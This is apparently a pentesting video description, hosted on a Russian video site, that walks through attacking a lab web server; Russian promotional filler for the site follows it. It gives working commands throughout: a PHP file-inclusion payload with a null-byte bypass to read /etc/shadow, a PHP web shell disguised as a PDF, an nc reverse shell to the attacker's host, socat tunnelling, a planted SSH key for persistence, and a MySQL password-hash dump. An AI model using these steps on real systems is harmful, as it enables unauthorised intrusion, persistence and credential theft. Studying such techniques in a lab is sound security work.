Web App Pentesting File Include & Post Exploitation
-Determine php include vulnerabilities on server
nikto -h http://192.168.87.135
-Test php include
http://192.168.87.135/index.php?page=%2Fetc%2Fshadow
-Error tell us no file in current directory, and that .php was passed
-We need to nullify the .php aspect, and only pass the command (this doesn’t work past 5.3.4)
-So let's modify:
http://192.168.87.135/index.php?page=%2Fetc%2Fshadow
-Add shadow%00 to remove .php command
http://192.168.87.135/index.php?page=%2Fetc%2Fpasswd%00
-Upload file using call to papers
-Check the extension and content on uploading…. Can only upload PDF
-Open PDF file- take a look at header, duplicate this in our code
-Server interprets file as PDF, but it's really php
-I can't add brackets to the description of the video, I've replaced them with "{" & "}"... please check the video to correct this when creating the php code:
%PDF-1.4
{?php
System($_GET["cmd"]);
?}
-Post exploitation
-Grab shell with File include
-Kali: nc -l -p 5412
-Vuln: nc 192.168.87.164 5412 –e /bin/bash
http://192.168.87.135/index.php?page=uploads%2Fshell.pdf%00&cmd=nc+192.168.87.164+5412+-e+%2Fbin%2Fbash
-Want to grab SSH, but firewalled = use socat
Ssh 192.168.87.135
sudo apt-get install socat (download socat on Vuln machine)
-Attacker cmd:
socat TCP4-LISTEN:443,reuseaddr,fork TCP4-LISTEN:2222,reuseaddr
-443 will listen for vuln server to connect
-2222 will listen for us to connect (which passes to remote servers redirect)
-Vuln cmd:
while true; do socat TCP4:192.168.87.146:443 TCP4:127.0.0.1:22; done
-Kill the loop once you don't needs redirection anymore
-SSH to remote host (on Kali)
ssh localhost -p 2222
id (on vuln system)
-Don't know www-data's password
ssh-keygen -N test123 -f vulnerable (on Kali)
mkdir ~www-data/.ssh (on Vuln)
-Change from "}}" to brackets: Please check video for code
echo "value" }} ~www-data/.ssh/authorized_keys
-Login via ssh with shell
ssh localhost -p 2222 -l www-data -i vulnerable
-Associate local host port 13306 with remote port 3306
ssh localhost -p 2222 -l www-data -i vulnerable -L 13306:localhost:3306
-Access remote database info
mysql -h localhost -u root -P 13306
show databases;
set mysql;
show tables;
show columns from user;
select host, user, password from user;
Что делает видео по-настоящему запоминающимся? Наверное, та самая атмосфера, которая заставляет забыть о времени. Когда вы заходите на RUVIDEO, чтобы посмотреть онлайн «Web App Pentesting File Include & Post Exploitation», вы рассчитываете на нечто большее, чем просто загрузку плеера. И мы это понимаем. Контент такого уровня заслуживает того, чтобы его смотрели в HD 1080, без дрожания картинки и бесконечного буферизации.
Честно говоря, Rutube сегодня — это кладезь уникальных находок, которые часто теряются в общем шуме. Мы же вытаскиваем на поверхность самое интересное. Будь то динамичный экшн, глубокий разбор темы от любимого автора или просто уютное видео для настроения — всё это доступно здесь бесплатно и без лишних формальностей. Никаких «заполните анкету, чтобы продолжить». Только вы, ваш экран и качественный поток.
Если вас зацепило это видео, не забудьте взглянуть на похожие материалы в блоке справа. Мы откалибровали наши алгоритмы так, чтобы они подбирали контент не просто «по тегам», а по настроению и смыслу. Ведь в конечном итоге, онлайн-кинотеатр — это не склад файлов, а место, где каждый вечер можно найти свою историю. Приятного вам отдыха на RUVIDEO!
Видео взято из открытых источников Rutube. Если вы правообладатель, обратитесь к первоисточнику.